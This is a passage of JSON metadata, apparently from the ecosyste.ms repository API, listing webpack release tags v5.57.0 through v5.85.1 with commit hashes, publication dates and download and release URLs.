itories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"